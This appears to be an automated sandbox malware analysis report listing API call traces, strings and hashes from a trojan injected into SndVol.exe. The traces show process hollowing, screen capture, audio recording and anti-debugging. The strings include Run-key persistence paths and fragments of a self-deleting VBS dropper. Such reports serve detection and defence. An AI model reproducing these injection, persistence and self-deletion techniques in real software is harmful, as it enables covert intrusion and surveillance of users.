• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02963CF3,?,?,?,?,0296374A,?,00000004), ref: 02970B61
• _wcschr.LIBVCRUNTIME ref: 02970BF1
• _wcschr.LIBVCRUNTIME ref: 02970BFF
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02963CF3,00000000,02963E13), ref: 02970CA2
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
• Opcode ID: c857d0d375e147c39a20c450e9196aa35e020059314203e219c87ffce773c804
• Instruction ID: d657067f93bde948e54285f9bb60d38313adda6fe750b154d057c4ba05bc9a3e
• Opcode Fuzzy Hash: c857d0d375e147c39a20c450e9196aa35e020059314203e219c87ffce773c804
• Instruction Fuzzy Hash: 2D610C71600306AADB24AB75CC85FBBB7ADEF84714F18046AE909DB180FB74D945CB61
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0295A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0295A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0295A76C
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 3df2aac1a7675dcfa71750b26e6e521ea586fc23e26f603a1c0dedda3973d1b2
• Instruction ID: 0b34be54ecc2e043db7eb307e60855d66344f6a8844c03032ca108d5adccb7f7
• Opcode Fuzzy Hash: 3df2aac1a7675dcfa71750b26e6e521ea586fc23e26f603a1c0dedda3973d1b2
• Instruction Fuzzy Hash: 6431B274D4122D9BCB21DF69D8887DDBBB8AF48310F5046EAE81CA7250E7309F958F58
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02937FB9
• CreateCompatibleDC.GDI32(00000000), ref: 02937FC4
  • Part of subcall function 02938452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 02938482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 02938045
• DeleteDC.GDI32(?), ref: 0293805D
• DeleteDC.GDI32(00000000), ref: 02938060
• SelectObject.GDI32(00000000,00000000), ref: 0293806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 02938093
• GetIconInfo.USER32(?,?), ref: 029380CB
• DeleteObject.GDI32(?), ref: 029380FA
• DeleteObject.GDI32(?), ref: 02938107
• DrawIcon.USER32(00000000,?,?,?), ref: 02938114
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 02938144
• GetObjectA.GDI32(?,00000018,?), ref: 02938173
• LocalAlloc.KERNEL32(00000040,00000028), ref: 029381BC
• LocalAlloc.KERNEL32(00000040,00000001), ref: 029381DF
• GlobalAlloc.KERNEL32(00000000,?), ref: 02938248
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0293826B
• DeleteDC.GDI32(?), ref: 0293827F
• DeleteDC.GDI32(00000000), ref: 02938282
• DeleteObject.GDI32(00000000), ref: 02938285
• GlobalFree.KERNEL32(00CC0020), ref: 02938290
• DeleteObject.GDI32(00000000), ref: 02938344
• GlobalFree.KERNEL32(?), ref: 0293834B
• DeleteDC.GDI32(?), ref: 0293835B
• DeleteDC.GDI32(00000000), ref: 02938366
• DeleteDC.GDI32(?), ref: 02938398
• DeleteDC.GDI32(00000000), ref: 0293839B
• DeleteObject.GDI32(?), ref: 029383A1
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 1765752176-865373369
• Opcode ID: 25520cd03ecb4233d6c6f69ad2a7569b18e0db701725d221828ef8029cd26931
• Instruction ID: 83401ea2aced4b790e44a1abf07a2e16d2a467f18db24f41e8c7481fb40467d6
• Opcode Fuzzy Hash: 25520cd03ecb4233d6c6f69ad2a7569b18e0db701725d221828ef8029cd26931
• Instruction Fuzzy Hash: DCC18D71948355AFD721DF64DC44BABBBE9FF88750F04092DF98A93250DB30A908CB62
APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0293728C
• GetProcAddress.KERNEL32(00000000), ref: 0293728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 029372A0
• GetProcAddress.KERNEL32(00000000), ref: 029372A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 029372B4
• GetProcAddress.KERNEL32(00000000), ref: 029372B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 029372C8
• GetProcAddress.KERNEL32(00000000), ref: 029372CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0293736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02937384
• GetThreadContext.KERNEL32(?,00000000), ref: 0293739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 029373C0
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02937440
• TerminateProcess.KERNEL32(?,00000000), ref: 02937454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0293748B
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02937558
• SetThreadContext.KERNEL32(?,00000000), ref: 02937575
• ResumeThread.KERNEL32(?), ref: 02937582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0293759A
• GetCurrentProcess.KERNEL32(?), ref: 029375A5
• TerminateProcess.KERNEL32(?,00000000), ref: 029375BF
• GetLastError.KERNEL32 ref: 029375C7
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
• API String ID: 4188446516-108836778
• Opcode ID: f030602f42a6500eac1086954f74a6a7cd17e522ff4e13ad21f2d9da7310a188
• Instruction ID: 16d797a6105b1e449680b38be8f682735a6e150f0a9e408d170ef9cf99b2db45
• Opcode Fuzzy Hash: f030602f42a6500eac1086954f74a6a7cd17e522ff4e13ad21f2d9da7310a188
• Instruction Fuzzy Hash: 28A19AB1A48305AFD7119FA5CC48BABBBEDFF88348F040829F689D2150E771E514CB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02931699: TerminateProcess.KERNEL32(00000000,pth_unenc,0292E670), ref: 029316A9
                                                                                                                          • Part of subcall function 02931699: WaitForSingleObject.KERNEL32(000000FF), ref: 029316BC
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0292C38B
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0292C39E
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0292C3B7
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0292C3E7
                                                                                                                          • Part of subcall function 0292AFBA: TerminateThread.KERNEL32(029299A9,00000000,029942F8,pth_unenc,0292BF26,029942E0,029942F8,?,pth_unenc), ref: 0292AFC9
                                                                                                                          • Part of subcall function 0292AFBA: UnhookWindowsHookEx.USER32(029940F8), ref: 0292AFD5
                                                                                                                          • Part of subcall function 0292AFBA: TerminateThread.KERNEL32(02929993,00000000,?,pth_unenc), ref: 0292AFE3
                                                                                                                          • Part of subcall function 0293B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02985900,00000000,00000000,0292C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0293B5CE
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,02985900,02985900,00000000), ref: 0292C632
                                                                                                                        • ExitProcess.KERNEL32 ref: 0292C63E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                        • API String ID: 1861856835-1536747724
                                                                                                                        • Opcode ID: 5957977e3942b0dd9788b5e7fabc72be07d7d97653439e84ea6bde8fabee2685
                                                                                                                        • Instruction ID: b534bc13452d44d2545195f1e29e4d000275516896a7f829c738547f81720b6f
                                                                                                                        • Opcode Fuzzy Hash: 5957977e3942b0dd9788b5e7fabc72be07d7d97653439e84ea6bde8fabee2685
                                                                                                                        • Instruction Fuzzy Hash: 8791C5316043205BD718FB24EC60ABF77DAAFD1710F44082EE48A971A9DF609D5DCE56
                                                                                                                        APIs
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,029942F8,?,00000000), ref: 029312D4
                                                                                                                        • ExitProcess.KERNEL32 ref: 0293151D
                                                                                                                          • Part of subcall function 0293265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,029942F8), ref: 02932679
                                                                                                                          • Part of subcall function 0293265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 02932692
                                                                                                                          • Part of subcall function 0293265D: RegCloseKey.ADVAPI32(00000000), ref: 0293269D
                                                                                                                          • Part of subcall function 0293B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0293135B
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,0292E154,?,?,?,?,00000000), ref: 0293136A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 02931375
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0293137C
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 02931382
                                                                                                                          • Part of subcall function 029327D5: RegCreateKeyA.ADVAPI32(80000001,00000000,02985554), ref: 029327E3
                                                                                                                          • Part of subcall function 029327D5: RegSetValueExA.KERNELBASE(02985554,000000AF,00000000,00000004,00000001,00000004,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 029327FE
                                                                                                                          • Part of subcall function 029327D5: RegCloseKey.ADVAPI32(02985554,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 02932809
                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 029313B3
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0293140F
                                                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 02931429
                                                                                                                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0293143B
                                                                                                                          • Part of subcall function 0293B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0293B5EB
                                                                                                                          • Part of subcall function 0293B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0293B5FF
                                                                                                                          • Part of subcall function 0293B58F: CloseHandle.KERNEL32(00000000), ref: 0293B60C
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02931483
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 029314C4
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,0292E154,?,?,?,?,00000000), ref: 029314D9
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 029314E4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 029314EB
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 029314F1
                                                                                                                          • Part of subcall function 0293B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02985900,00000000,00000000,0292C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0293B5CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                        • String ID: .exe$WDH$exepath$open$temp_
                                                                                                                        • API String ID: 4250697656-3088914985
                                                                                                                        • Opcode ID: e2dcb2e0e194311df0d2e00dd89e939ff89722b88118ac15d263a62be796c5c7
                                                                                                                        • Instruction ID: 24d6e38fa9329aecbbb3eca11b8a0ebdc5fc056f82ee04cb77e83fffb9524999
                                                                                                                        • Opcode Fuzzy Hash: e2dcb2e0e194311df0d2e00dd89e939ff89722b88118ac15d263a62be796c5c7
                                                                                                                        • Instruction Fuzzy Hash: AB51E671E443156BEF05B7A0AC48FFE736E9B84314F440555B90AA71D4DF748E4A8F90
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0293A2B2
                                                                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0293A2C6
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02985554), ref: 0293A2EE
                                                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,02993EE8,00000000), ref: 0293A2FF
                                                                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0293A340
                                                                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0293A358
                                                                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0293A36D
                                                                                                                        • SetEvent.KERNEL32 ref: 0293A38A
                                                                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0293A39B
                                                                                                                        • CloseHandle.KERNEL32 ref: 0293A3AB
                                                                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0293A3CD
                                                                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0293A3D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                        • API String ID: 738084811-1354618412
                                                                                                                        • Opcode ID: bb0a3477d2aaa0912b35127f35aace38b69c747cf2fb4b41844a0dec8ce5b756
                                                                                                                        • Instruction ID: 53a998ca49234799584622819d9a0a098e90cc58ff5c6faacddfbd5281572eb5
                                                                                                                        • Opcode Fuzzy Hash: bb0a3477d2aaa0912b35127f35aace38b69c747cf2fb4b41844a0dec8ce5b756
                                                                                                                        • Instruction Fuzzy Hash: 9251F171A883046FE715FB24DC91EBF7B9EEBC0368F04082DF09A92195DE604D1D8A62
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02921C54
                                                                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 02921C7E
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 02921C8E
                                                                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 02921C9E
                                                                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 02921CAE
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02921CBE
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02921CCF
                                                                                                                        • WriteFile.KERNEL32(00000000,02991B02,00000002,00000000,00000000), ref: 02921CE0
                                                                                                                        • WriteFile.KERNEL32(00000000,02991B04,00000004,00000000,00000000), ref: 02921CF0
                                                                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 02921D00
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02921D11
                                                                                                                        • WriteFile.KERNEL32(00000000,02991B0E,00000002,00000000,00000000), ref: 02921D22
                                                                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 02921D32
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02921D42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Write$Create
                                                                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                                                                        • API String ID: 1602526932-4212202414
                                                                                                                        • Opcode ID: 20cfede1c3807e857c93c6e89e730fc35e43cae3ba62e4a1e455f18df1c4a961
                                                                                                                        • Instruction ID: 6996e62901fe9ce0b36f3f517888e87d87c399a2fc6960d68ba186832762a599
                                                                                                                        • Opcode Fuzzy Hash: 20cfede1c3807e857c93c6e89e730fc35e43cae3ba62e4a1e455f18df1c4a961
                                                                                                                        • Instruction Fuzzy Hash: 5D4180726443197AE210DE55DD86FBBBFECEB85B50F41081AF644D6080E7A4E909CBB3
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\SndVol.exe,00000001,029268B2,C:\Windows\SysWOW64\SndVol.exe,00000003,029268DA,029942E0,02926933), ref: 029264F4
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 029264FD
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0292650E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02926511
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02926522
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02926525
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02926536
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02926539
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0292654A
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0292654D
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0292655E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02926561
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                        • API String ID: 1646373207-2877372328
                                                                                                                        • Opcode ID: 96e15d4a920eddfdc7f7d5fb7b2d9b9d8183db1e644665b1b4f16092261326c6
                                                                                                                        • Instruction ID: 21e5b02eb894ffecfe10d11f1096f66c0853a0d91e7443b9c1f8dfc3253def5e
                                                                                                                        • Opcode Fuzzy Hash: 96e15d4a920eddfdc7f7d5fb7b2d9b9d8183db1e644665b1b4f16092261326c6
                                                                                                                        • Instruction Fuzzy Hash: 0C011EB4E8432765EB22777E5C54C2BAFEDAE941A430A0826A506D359DEF74C018CD74
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0293B1D6
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0293B1EE
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0293B207
                                                                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0293B242
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0293B255
                                                                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0293B299
                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0293B2B4
                                                                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0293B2CC
                                                                                                                        • _wcslen.LIBCMT ref: 0293B2DB
                                                                                                                        • FindVolumeClose.KERNEL32(?), ref: 0293B2FB
                                                                                                                        • GetLastError.KERNEL32 ref: 0293B313
                                                                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0293B340
                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0293B359
                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0293B368
                                                                                                                        • GetLastError.KERNEL32 ref: 0293B370
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 3941738427-1684325040
                                                                                                                        • Opcode ID: 6e697c80eeb9d31d6eaba3cc77584c8ce47360bf2da81c68a8600af5f8689503
                                                                                                                        • Instruction ID: 57ae3b35c546b252aa0a3b165950b7cfb01f708d90bc63d77b4da2fdede1b4b1
                                                                                                                        • Opcode Fuzzy Hash: 6e697c80eeb9d31d6eaba3cc77584c8ce47360bf2da81c68a8600af5f8689503
                                                                                                                        • Instruction Fuzzy Hash: A0417071948315ABD721DFA1D888AEFB7ECFB99718F400D2AF541C2160EB70C558CB92
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899193279-0
                                                                                                                        • Opcode ID: 42d8d54fdcb88d702f95cb997a4154ac65d4279fad0249fa8b65ee6de2a67905
                                                                                                                        • Instruction ID: ea7460ebd539abd3b55b54685cbb1426d25ea0d028e7557da39106c1182f0efa
                                                                                                                        • Opcode Fuzzy Hash: 42d8d54fdcb88d702f95cb997a4154ac65d4279fad0249fa8b65ee6de2a67905
                                                                                                                        • Instruction Fuzzy Hash: 76D15979D04301AFDF25AF788888E7E7BEDAF45360F09456DE98997280E7328640CF91
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02933E86
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02933EC8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933EE8
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 02933EEF
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02933F27
                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933F39
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 02933F40
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 02933F4F
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 02933F66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                        • API String ID: 2490988753-744132762
                                                                                                                        • Opcode ID: b7fa16f496e0966d1c23550295f0ff19147f2d0113f3d8c20cbbd95c8c92b0d7
                                                                                                                        • Instruction ID: 2bf08f63fadaa2bb3c86ebeb537944fa48ad605c7cbea93a7995eadeb560a530
                                                                                                                        • Opcode Fuzzy Hash: b7fa16f496e0966d1c23550295f0ff19147f2d0113f3d8c20cbbd95c8c92b0d7
                                                                                                                        • Instruction Fuzzy Hash: B1312C71945315ABE322EB64DD48E9FB7ECEF84758F450A68F844D3100D734C9048BEA
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0293B846
                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0293B88A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0293BB54
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
